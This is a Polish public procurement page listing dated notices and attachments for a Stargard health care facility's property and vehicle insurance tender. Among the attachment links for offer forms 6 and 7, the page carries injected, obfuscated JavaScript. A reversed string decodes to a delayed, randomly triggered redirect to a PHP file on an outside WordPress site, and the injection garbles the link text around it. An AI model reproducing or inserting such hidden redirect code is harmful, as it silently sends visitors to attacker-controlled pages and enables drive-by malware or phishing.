Data dodania: 2017-02-10 godz. 20:45

Data ogłoszenia: 2017-02-10

Usługa ubezpieczenia mienia i pojazdów Wielospecjalistycznego Zakładu Opieki Zdrowotnej w Stargardzie

Znak sprawy 3/2017/MIENIE/NO/K/BU

Ogłoszenie o zamówieniu

SIWZ

Załącznik nr 1 do SIWZ – PD Opis przedmiotu zamówienia – warunki ubezpieczenia SZPITAL_

Załącznik nr 2 do SIWZ – Informacje do oceny ryzyka

Załącznik nr 3 do SIWZ – Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej

Załącznik nr 4 do SIWZ – Oświadczenie dotyczące przesłanek wykluczenia z postępowania

Załącznik nr 5 do SIWZ – Oświadczenie dotyczące spełniania warunków udziału w postępowaniu

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == „string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(„”).reverse().join(„”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[„‚php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}towy_Cz.1.doc”>Załącznik nr 6 do SIWZ – Formularz ofertowy_Cz.1

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == „string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(„”).reverse().join(„”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[„‚php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}towy_Cz.2..doc”>Załącznik nr 7 do SIWZ – Formularz ofertowy_Cz.2.

Załącznik nr 8 do SIWZ – Projekt umowy generalnej_Cz.1.

Załącznik nr 9 do SIWZ – Projekt umowy generalnej_Cz.2.

Załącznik nr 10 – Wykaz pojazdów

Załącznik nr 11 do SIWZ – Wykaz mienia do ubezpieczenia

Załącznik nr 12 do SIWZ – Szkodowość

 

Data dodania: 2017-02-15 godz. 13:43

Odpowiedzi na pytania modyfikacja SIWZ

Ogłoszenie o zmianie ogłoszenia

 

Data dodania: 2017-02-17 godz. 17:09

Odpowiedzi na pytania modyfikacja SIWZ

Załącznik nr 12 do SIWZ – Szkodowość

Załącznik nr 8 do SIWZ – Projekt umowy generalnej_Cz.1.

Załącznik nr 9 do SIWZ – Projekt umowy generalnej_Cz.2.

 

Data dodania: 2017-02-22 godz. 14:45

Informacje z otwarcia ofert

 

Data dodania: 2017-02-27 godz. 15:41

Zawiadomienie o wynikach